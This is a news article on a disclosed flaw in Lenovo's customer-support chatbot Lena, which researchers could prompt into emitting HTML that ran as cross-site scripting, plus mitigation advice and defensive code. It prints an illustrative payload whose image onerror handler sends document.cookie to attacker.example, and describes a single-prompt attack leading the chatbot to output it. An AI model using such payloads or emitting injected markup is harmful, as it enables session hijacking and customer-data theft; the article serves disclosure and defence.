Security flaws in Lenovo's customer support AI chatbot could let attackers execute malicious code and access sensitive networks
A recent investigation by Cybernews uncovered security vulnerabilities in Lenovo's customer service AI chatbot, Lena, which could potentially allow attackers to steal data and compromise customer support systems.
The researchers found that a single prompt was enough to perform cross-site scripting (XSS): the chatbot could be tricked into emitting malicious HTML, which the victim's browser then rendered and executed. The payload included an image tag pointing to a nonexistent resource; when the browser failed to load the image, it made a network request to an attacker-controlled server and sent all cookie data as part of the URL.
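For illustration, a payload of the class described above generally takes the shape sketched below. The markup is simplified and the domain attacker.example is a hypothetical placeholder; this is not the researchers' actual prompt.

```typescript
// Illustrative only: the general shape of a cookie-stealing XSS payload.
// "attacker.example" is a hypothetical placeholder, not a real endpoint.
const injectedHtml: string = `
  <img src="nonexistent.png"
       onerror="fetch('https://attacker.example/collect?c='
                + encodeURIComponent(document.cookie))">
`;
```

Because the image source never resolves, the onerror handler fires as soon as the chat window renders the reply, exfiltrating the session cookie without any further user interaction.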
Using a stolen session cookie to log in to the Lenovo chatbot platform, an attacker could potentially access active chats with other users, previous conversations, and customer data. It might also be possible for an attacker to execute some system commands, which could allow the installation of backdoors and lateral movement across the network.
The researchers also warned that Large Language Models (LLMs) have no instinct for what is 'safe': they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents.
Zilvinas Girenas, head of product at nexos.ai, commented that any AI system without strict input and output controls creates an opening for attackers. He advised avoiding inline JavaScript and extending content-type validation through the entire stack to prevent unintended HTML rendering.
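A minimal sketch of what such output-side controls might look like, assuming a Node.js endpoint that relays chatbot replies; the endpoint, port, and reply value are placeholders, not Lenovo's implementation. Declaring a non-HTML content type and a restrictive Content-Security-Policy header provides defense in depth even if escaping fails elsewhere:

```typescript
// Sketch only: a hypothetical relay endpoint for chatbot replies.
import { createServer } from "node:http";

createServer((_req, res) => {
  const reply = "chatbot reply goes here"; // placeholder for the LLM output
  // Serve as plain text so browsers never interpret the reply as HTML.
  res.setHeader("Content-Type", "text/plain; charset=utf-8");
  // Defense in depth: forbid inline scripts even if markup slips through.
  res.setHeader("Content-Security-Policy", "default-src 'self'");
  res.end(reply);
}).listen(8080);
```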
The researchers recommended applying a strict whitelist of allowed characters, data types, and formats to all user inputs and all chatbot responses, with problematic characters automatically encoded or escaped.
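A minimal sketch of that recommendation, assuming chat messages should contain only ordinary text; the character whitelist, length limit, and function names are illustrative, not the researchers' exact rules:

```typescript
// Sketch only: whitelist validation for inputs plus HTML-escaping for outputs.
const ALLOWED_INPUT = /^[\p{L}\p{N}\s.,!?'"()-]{1,2000}$/u; // illustrative whitelist

function isValidInput(message: string): boolean {
  // Reject any message containing characters outside the whitelist.
  return ALLOWED_INPUT.test(message);
}

function escapeHtml(text: string): string {
  // Encode the characters a browser would otherwise treat as markup.
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```

Escaping on output as well as filtering on input means that anything slipping past validation is still rendered as inert text rather than executed.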
The researchers disclosed the flaw on July 22, and Lenovo acknowledged it on August 6. The flaw was mitigated by August 18, but Lenovo did not respond to a request for comment by the time of publication.
It is not known whether the vulnerabilities were exploited in the wild or whether any customer data was actually stolen. The flaw nonetheless highlights the dangers of an overly 'helpful' AI blindly following instructions, potentially putting customer privacy and company security at serious risk.